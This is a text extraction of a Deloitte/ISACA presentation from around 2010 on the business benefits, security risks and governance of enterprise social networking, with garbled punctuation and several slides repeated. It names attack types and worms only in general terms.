Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
